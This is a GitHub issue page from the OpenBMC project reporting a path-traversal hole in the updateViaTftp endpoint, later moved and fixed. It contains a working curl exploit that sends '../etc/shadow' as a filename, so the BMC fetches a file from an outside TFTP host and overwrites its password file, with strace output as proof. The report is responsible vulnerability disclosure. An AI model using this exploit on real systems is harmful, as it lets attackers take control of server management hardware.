Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[security] overwrite any file on the bmc with updateViaTftp #133

Closed
ya-mouse opened this issue Dec 7, 2016 · 5 comments
Closed

[security] overwrite any file on the bmc with updateViaTftp #133

ya-mouse opened this issue Dec 7, 2016 · 5 comments
Assignees
@gtmills @anoo1

Comments

@ya-mouse
Copy link

ya-mouse commented Dec 7, 2016
edited
Loading

I've found a security hole that allows to override any bmc file via updateViaTftp command:

curl -v -b cjar -k -X POST -H "Content-Type: application/json" \
   -d '{"data": ["10.1.0.1", "../etc/shadow"]}' \
   https://10.1.0.102/org/openbmc/control/flash/bmc/acion/updateViaTftp

This will override /etc/shadow on the bmc with the user's content from "etc/shadow" on tftp server.

Before exploiting:

# md5sum /etc/shadow
7f2131b66f559a79b7198b64a8577048 /etc/shadow

Here is a part of strace log from /usr/sbin/download_manager.py process:

[pid  2520] open("/tmp/../etc/shadow", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
[pid  2520] sendto(3, "\0\1../etc/shadow\0octet\0", 22, 0, {sa_family=AF_INET, sin_port=htons(69), sin_addr=inet_addr("10.1.0.1")}, 16) = 22
[pid  2520] recvfrom(3, "\0\3\0\1root:$1$UGMqyqdG$FZiylVFmRRf"..., 516, 0, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, [16]) = 516
[pid  2520] connect(3, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, 16) = 0
[pid  2520] write(4, "root:$1$UGMqyqdG$FZiylVFmRRfl9Z0"..., 512) = 512
[pid  2520] sendto(3, "\0\4\0\1", 4, 0, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, 16) = 4
[pid  2520] read(3, "\0\3\0\2:*:17141:0:99999:7:::\navahi:"..., 516) = 133
[pid  2520] write(4, ":*:17141:0:99999:7:::\navahi:!:17"..., 129) = 129

After upload:

# md5sum /etc/shadow
28f761c4178e7f709a5bdce6943c4496  /etc/shadow
@williamspatrick
Copy link
Member

We plan to get rid of download_manager.py in its current form. I'll look and see if there is an easy way to clean this up now though.

@ya-mouse
Copy link
Author

ya-mouse commented Dec 8, 2016

just get basename for filename in:
https://github.com/openbmc/skeleton/blob/master/pydownloadmgr/download_manager.py#L59
or use temporary names.

@ya-mouse ya-mouse mentioned this issue Feb 9, 2017
Closed
@williamspatrick
Copy link
Member

Once we get the new TFTP server in we should disable the one from skeleton. When that happens this issue can be closed. We are ensuring the new TFTP server does not have this issue.

@rfrandse rfrandse added the bug label Jun 21, 2017
@rfrandse rfrandse removed the bug label Jul 5, 2017
@rfrandse rfrandse mentioned this issue Jul 5, 2017
Closed
@rfrandse rfrandse closed this as completed Jul 5, 2017
@rfrandse
Copy link

rfrandse commented Jul 5, 2017

Issue moved to openbmc/openbmc #1898 via ZenHub

@gtmills
Copy link
Member

gtmills commented May 23, 2018

https://gerrit.openbmc-project.xyz/#/c/7117/ fixed this

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@gtmills gtmills

@anoo1 anoo1

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@williamspatrick @ya-mouse @gtmills @anoo1 @rfrandse